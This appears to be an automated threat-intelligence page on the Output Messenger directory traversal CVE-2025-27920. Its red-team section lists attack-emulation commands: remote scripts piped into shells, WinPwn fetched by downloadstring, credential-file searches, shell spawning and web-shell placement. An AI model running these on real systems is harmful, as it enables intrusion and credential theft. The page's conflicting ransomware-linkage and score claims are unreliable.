CVE-2025-27920
Overview
This vulnerability is a directory traversal flaw caused by improper sanitization of file path parameters in Srimax Output Messenger versions prior to 2.0.63. The affected component fails to correctly validate or normalize user-supplied input containing "../" sequences, allowing traversal outside the intended directory scope. This weakness resides in the file handling routines responsible for managing resource access within the messaging application.
Vulnerability Description
Output Messenger before 2.0.63 was vulnerable to a directory traversal attack through improper file path handling. By using ../ sequences in parameters, attackers could access sensitive files outside the intended directory, potentially leading to configuration leakage or arbitrary file access.
Impact
An unauthenticated attacker can leverage this vulnerability to read sensitive configuration files and other arbitrary files on the server hosting Output Messenger. This unauthorized file access can expose credentials, system information, or private data, potentially facilitating further attacks or data breaches. Since no authentication or user interaction is required, exploitation can be performed remotely, increasing the risk of information disclosure and operational impact to affected organizations.
Solution
Srimax has addressed this vulnerability in Output Messenger version 2.0.63. Users should upgrade to this version or later to mitigate the issue. Detailed patch instructions and updates are available on the official Srimax product page and advisory at https://www.outputmessenger.com/cve-2025-27920/. No specific workarounds are documented; applying the vendor-supplied patch is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
underground
|
MEDIUM | 26 | correlation_ai |
Full Analysis
The vulnerability in Output Messenger arises from improper file path handling, specifically allowing directory traversal attacks. This flaw enables attackers to manipulate file paths by using sequences such as "../" to navigate outside the intended directory structure. As a result, unauthorized access to sensitive files can occur, leading to potential exposure of configuration files or other critical data. The underlying issue stems from insufficient validation of user input, allowing malicious actors to exploit the software's file handling capabilities. This oversight can be particularly damaging, as it opens the door to accessing files that should remain protected, thereby compromising the integrity and confidentiality of the system.
Attack vectors for this vulnerability are relatively straightforward, as they primarily rely on crafting specific requests that include directory traversal sequences. An attacker could exploit this flaw by sending specially crafted HTTP requests or other input forms that contain these sequences. For instance, if a web application is designed to retrieve user-uploaded files or configuration settings based on user input, an attacker could manipulate the input to reference files outside the designated directory. Scenarios may include accessing sensitive configuration files that contain database credentials, API keys, or other critical information, which could then be used for further attacks or data breaches.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Output Messenger for communication and collaboration. The potential for configuration leakage poses a severe business risk, as exposed credentials or sensitive information can lead to unauthorized access to other systems or services. Furthermore, the ability to access arbitrary files can facilitate further exploitation, such as deploying malware or stealing sensitive data. The reputational damage from a data breach can also have long-lasting effects, leading to loss of customer trust and potential legal ramifications. Organizations must recognize that the implications of such vulnerabilities extend beyond immediate technical concerns, impacting overall business continuity and security posture.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular security assessments and code reviews should be conducted to identify and remediate instances of improper input validation. Employing web application firewalls (WAFs) can help detect and block malicious requests that attempt to exploit directory traversal vulnerabilities. Additionally, implementing strict access controls and ensuring that sensitive files are stored outside of web-accessible directories can further reduce the risk of unauthorized access. Organizations should also consider adopting a security-first development approach, incorporating secure coding practices and conducting thorough testing to prevent similar vulnerabilities from being introduced in the future.
In conclusion, the directory traversal vulnerability in Output Messenger highlights the critical importance of robust input validation and secure file handling practices. The potential for unauthorized access to sensitive files poses significant risks to organizations, necessitating proactive measures to detect and mitigate such vulnerabilities. By adopting comprehensive security strategies and fostering a culture of security awareness, organizations can better protect themselves against the evolving threat landscape and safeguard their valuable data assets.
Recent updates to CVE-2025-27920 reflect a downward revision of its CVSS score from 8.8 to 7.2, accompanied by a slight decrease in the Exploit Prediction Scoring System (EPSS) value. This adjustment follows a more refined assessment of the vulnerability’s exploitability and impact potential. CSURFACE threat intelligence notes that while the vulnerability remains classified as high severity, the recalibrated scores suggest a somewhat reduced likelihood of widespread exploitation or immediate operational impact. Our telemetry continues to show no emergence of new exploit techniques or active campaigns leveraging this directory traversal flaw, and ransomware groups have not been linked with its exploitation. The vulnerability’s inclusion in the Known Exploited Vulnerabilities (KEV) catalog remains recent, with no significant changes in exploitation trends. For defenders, this means that although the risk remains material, the urgency for immediate incident response may be moderated, allowing for prioritized resource allocation. Overall, the updated risk profile indicates a stable but persistent threat that warrants continued monitoring rather than an escalated alert posture.
Update 2 — June 09, 2026
The recent elevation of CVE-2025-27920’s CVSS score from 7.2 to 8.8 reflects a reassessment of the vulnerability’s potential impact and exploitability, now formally recognized through its addition to the Known Exploited Vulnerabilities (KEV) catalog. This change signals increased confidence in the severity and practical risk posed by the directory traversal flaw in Output Messenger versions prior to 2.0.63. Although our telemetry has not detected a marked escalation in active exploitation or ransomware group involvement, the vulnerability’s EPSS score remains high and stable, indicating a persistent likelihood of exploitation attempts in the near term. For defenders, this updated risk profile underscores the necessity of maintaining vigilant monitoring and prioritizing patch management, as the vulnerability’s inclusion in KEV typically correlates with heightened attacker interest and potential targeting. While immediate exploitation campaigns have not surged, the formal recognition and scoring adjustment suggest that the threat landscape may evolve rapidly, warranting sustained attention to this issue.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Srimax | Output Messenger | All |
cpe:2.3:a:srimax:output_messenger:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Ransomware Groups 1
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (26 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-27920 |
| srimax.com |
GitHub CVE
|
https://www.srimax.com/products-2/output-messenger/ |
| outputmessenger.com |
GitHub CVE
|
https://www.outputmessenger.com/cve-2025-27920/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-27920 |
| microsoft.com |
NVD API
Mitigation
Third Party Advisory
|
https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/ |